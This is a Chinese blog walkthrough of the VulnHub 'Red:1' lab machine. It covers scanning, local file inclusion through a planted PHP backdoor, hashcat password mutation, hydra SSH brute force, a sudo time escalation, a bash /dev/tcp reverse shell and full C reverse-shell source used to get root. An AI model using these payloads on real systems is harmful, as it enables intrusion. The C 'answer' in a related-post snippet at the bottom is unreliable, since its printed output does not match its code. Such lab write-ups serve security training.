VulnHub | Red:1

最新推荐文章于 2023-06-15 15:18:51 发布
最新推荐文章于 2023-06-15 15:18:51 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: VulnHub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45377713/article/details/122029268
版权

Red : 1

目录

项目地址

http://www.vulnhub.com/entry/red-1,753/
难度:Medium

测试环境

攻击机:Kali 192.168.56.109

目标靶机:Ubuntu 192.168.56.113

测试过程

信息收集

查找靶机IParp-scan -I eth1 -l,获取到目标IP为192.168.56.113。
1

使用nmap扫描目标开放了哪些端口nmap -sS -p- -n 192.168.56.113,nmap -sV -p22,80 -n 192.168.56.113
2

访问目标网站,并没有被解析,显示并不完整,查看源码,超链接都指向redrocks.win,修改hosts文件,将redrocks.win指向192.168.56.113。
3

网页恢复正常,是个wordpress站点。在查看redrocks.win/2021/10/24/hello-world/源码时发现有行奇怪的注释,一开始以为是网站的用户名,但是使用忘记密码页面时显示无此账户,并且它的首字母大写并不是很正常Looking For It,缩写就是LFI(Local File Inclusion)
![4]https://img.freeaes.com/images/2021/12/19/4.png

查找后门文件

并且网站页面上有hacker留下的信息You’ll never find the backdoor,证明是有后门文件的,通过gobuster使用https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt文件进行遍历,先将文件保存到本地,执行gobuster dir -u http://redrocks.win -w CommonBackdoors-PHP.fuzz.txt,应为文件内已有后缀,所以不用再指定后缀名。

5

找到一个NetworkFileManagerPHP.php。状态码为500,因为是个文件包含所以应该需要一个参数指定包含的文件名,通过burpsuite使用https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/burp-parameter-names.txt文件进行爆破,将文件保存到本地,使用Intrude模块导入字典,设置好参数后爆破得到参数为key

6

7

后门利用

可以看到除了root外还有四个用户,因为直接读取wp-config.php不成功,所以需要使用php伪协议读取php://filter/convert.base64-encode/resource=wp-config.php,选中base64密文,按Ctrl+Shift+B解密。文件内有数据库的用户名和其密码john/R3v_m4lwh3r3_k1nG!!,但是并不能用来登录后台或ssh

8

9

通过读取Network File Manager PHP.php文件发现里面有一串注释过的信息That password alone won't help you! Hashcat says rules are rules

10

11

hash碰撞

hashcat的规则有很多,不过鉴于信息是由base64提供的,选择bset64规则进行hash碰撞hashcat --force pass -r /usr/share/hashcat/rules/best64.rule --stdout > pswd

12

13

使用解出的密码通过hydra进行ssh爆破hydra -l john -P pswd ssh://192.168.56.113,得出密码为R3v_m4lwh3r3_k1nG!!0,使用ssh连接。

14

会话维持

使用sudo -l查看当前用户可执行的命令,有time,执行sudo -u ippsec /usr/bin/time /bin/bash切换到ippsec用户。

15

hacker会不断的给我们发送信息干扰,一段时间后还会将我们踢出连接并修改密码。
首先我们反弹一个shell到kali。先在kali执行nc -lvvp 8848建立监听端口,然后在目标机器上执行bash -i >& /dev/tcp/192.168.56.109/8848 0>&1。反弹成功后执行python3 -c 'import pty;pty.spawn("/bin/bash")',这样即使ssh被踢掉也不会断开。

16

权限提出

网站目录下的wordpress目录内有个.git目录,里面有两个文件,rev和supersecretfileuc.c,rev是supersecretfileuc.c编译的程序,执行会输出信息,就是red时不时弹出的骚扰信息,将rev删除后过段时间会重新编译,并且是root权限。

17

删掉这两个文件,用revshells.com网站生成C的反弹shell程序,通过http服务将其传到目标机器写入supersecretfileuc.c

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 9001;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.56.109");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("sh", argv, NULL);

    return 0;       
}

并在kali监听9001端口,过段时间它会自动编译并执行。在root目录下有个root.txt文件。

18

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D1SUJi8s-1639916470589)(https://img.freeaes.com/images/2021/12/19/19.png)]

20

薛定的餓貓
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dailyrandomphoto.github.io:https:www.dailyrandomphoto.com | https:dailyrandomphoto.web.app | https:dailyrandomphoto.now.sh
02-15
dailyrandomphoto.github.io 关于每日随机照片每日随机照片是一个博客,它通过每日随机照片讲述每日热门新闻。 每天从互联网上随机选择... 用 :red_heart: 对于互联网的人们。照片来源取消飞溅每日报价来源BrainyQuote
Vulnhub靶场】RED: 1
DG_s1mple
03-18 1766
环境准备 下载靶机导入到vmware 但是获取不到地址,可以根据我博客里的方法修改网卡来获取IP地址 信息收集 我们改好网卡之后,我们使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.15 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开放的端口信息 只开放了ssh跟80端口,我们首先访问他的网站 发现是一个被黑了的网站,点击search后,会跳到一个域名 我们修改hosts解析 渗透开始 修改好后,网站可以正常访问了,我们看看有没有什
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3359
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1602
Vulnhub-CTF5靶机实战
kali之vulnhub,hardsocnet2
weixin_54431413的博客
05-15 996
一、利用最近公布的ubuntu 8.4 内核提权漏洞来进行了提取,简便的得到了服务器root权限。 二、利用缓冲区溢出来执行admin留下的backdoor来获得root权限,涉及gdb调试,汇编语言等
VulnHub渗透测试实战靶场 - ACID: SERVER
LYJ20010728的博客
08-05 857
VulnHub渗透测试实战靶场 - ACID: SERVER环境下载ACID: SERVER靶机搭建渗透测试信息收集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 ACID: SERVER靶机搭建 将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可 渗透测试 信息收集 使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24 用Nmap对获取到的靶机IP地址进行扫描:sudo n
ttall:TTALL 堆栈的 Laravel 前端预设 - Tailwindcss | 涡轮链接 | 高山.js | 拉拉维尔 | 热线:rocket:
05-30
Laravel 7 及更高版本的 TTALL 预设 用于TTALL堆栈的自以为是的Laravel前端... :star: :red_heart: 内容 支持 学分 执照 安装 要在 Laravel 应用程序上安装此预设,请运行: composer require pktharindu/ttall --
Akash1362000:GitHub Readme Ak带有实时GitHub Stats的Akash Shrivastava的个人资料:bar_chart:| 条纹:fire:| 最常用的语言:laptop:和最近的项目:hammer_and_wrench:
05-27
全栈热心者 :man::laptop: Django和Android :red_heart: 爱编码 :man::laptop: 爱好: :male_sign:‍:male_sign: 和 :camera_with_flash: 想和我联系吗? 放个嗨 :waving_hand: !通常与 :hammer_and_pick: 最常用...
RED:RED-机器人编辑器
05-02
一般信息RED是基于Eclipse IDE的现代编辑器,可通过测试软件提供高效,舒适的工作。 最新版本从市场/更新站点安装市场:单击“帮助”->“ Eclipse市场”->并在“查找”字段中键入“红色”。更新站点:单击“帮助”->...
node-red:节点红研究
05-19
节点红项目组成必须先安装git。 有关详细数据,请参阅Excel文件。列表01-安装并运行02-mongodb,studio 3T,Roto 3T的安装和使用03-如何使用节点红色项目04-安装mongodb罗盘并设置mongodb密码05-设置节点红色密码06-...
vulnhub VulnOS: 2
箭雨镜屋
12-05 2546
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
vulnhub Gigachad靶场练习
qq_51283187的博客
08-21 327
vulnhub Gigachad靶场练习 把IP的问题解决好,然后就开始渗透了! 首先信息收集,nmap 先ifconfig看看kali处于哪个C段 我这边是192.168.43.0/24 所以 nmap -sn --min-parallelism 100 --min-hostgroup 256 192.168.43.0/24 探测存活的主机 -sn 代表存活主机扫描,不进行端口测探。 –min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3363
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
[VulnHub靶机渗透]三:Lazysysadmin
qq_45927819的博客
03-08 2854
文章目录一、实验环境二、信息收集三、渗透测试1. 22端口(ssh爆破)2. 80端口phpmyadmin入手: 一、实验环境 kali:192.168.56.104 扫描同一网段,探测主机: nmap -sP 192.168.56.0/24 这就好办了,确定靶机ip为192.168.56.103 二、信息收集 扫描端口: nmap -sS -Pn -T4 -sV -O 192.168.56.103 所得到的信息: OS: Linux 3.2 - 4.9(Ubuntu) 22端口: ssh——OpenS
Cloud AV靶机渗透过程
捣蛋鬼
03-26 2530
背景:云防病毒扫描服务,测试阶段 目标:渗透该服务,找到漏洞并提权 难易程度:简单(思路和技巧) 攻击方法:端口扫描 web侦察 SQL注入 命令注入 密码爆破 代码分析 NC串联 本地提权 0x01 主机发现:sudo arp-scan -l 倾向于黑客工具 arping 更多系统适用 使用for循环--for i in $(seq 1 254); do sudo arping -c 1 2.2.2.$i;done 0x02 使用nmap全端口扫描:sudo nmap -p-...
vulnhub-DarkHole 1-靶场-打靶记录
最新发布
lcc001114的博客
06-15 528
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1665
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
vulnhub之sherlock
鲨鱼辣椒的博客
08-12 1224
靶机下载地址:https://www.vulnhub.com/entry/ha-sherlock,580/ 信息搜集 扫描网段获取真实IP地址 扫描IP地址获取服务以及开放端口信息 可以看到有好几个服务都是与邮件有关的一些协议,那么相信重头戏就是与邮件相关了 浏览器查看网站 在浏览整个网页之后,我想我大概明白我们要干什么了,应该是帮助夏洛克先生找到这次案件的真实凶手(神探夏洛克巨好看),案件大概就是有一位先生在他的公寓中遇害了,我们需要做的就是根据这位先生在他的电脑中留下来的线索找到凶.
用C语言编写程序有两个红球、三个黄球、四个白球,任意取五个球,其中必须有一个黄球,编程输出所有可 能的方案。输出样例: red:0 yellow:1 white:4 red:0 yellow:2 white:3 red:0 yellow:3 white:2 red:1 yellow:1 white:3 red:1 yellow:2 white:2 red:1 yellow:3 white:1 red:2 yellow:1 white:2 red:2 yellow:2 white:1 red:2 yellow:3 white:0
05-25
以下是用 C 语言编写的程序实现要求: ```c #include <stdio.h> void printResult(int red, int yellow, int white) { printf("red:%d yellow:%d white:%d\n", red, yellow, white); } int main() { int red = 2, yellow = 3, white = 4; for(int i=1; i<=3; i++) { for(int j=0; j<=2; j++) { for(int k=0; k<=1; k++) { if(i+j+k == 5) { printResult(j, i, k); } } } } return 0; } ``` 程序中,我们使用三个循环,分别枚举黄球、红球和白球的个数。当它们的总数为 5 时,就可以输出一种方案。注意,由于题目要求必须有一个黄球,因此在循环中我们将黄球从 1 开始枚举。最终的输出结果如下: ``` red:0 yellow:1 white:4 red:0 yellow:2 white:3 red:0 yellow:3 white:2 red:1 yellow:1 white:3 red:1 yellow:2 white:2 red:1 yellow:3 white:1 red:2 yellow:1 white:2 red:2 yellow:2 white:1 red:2 yellow:3 white:0 ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值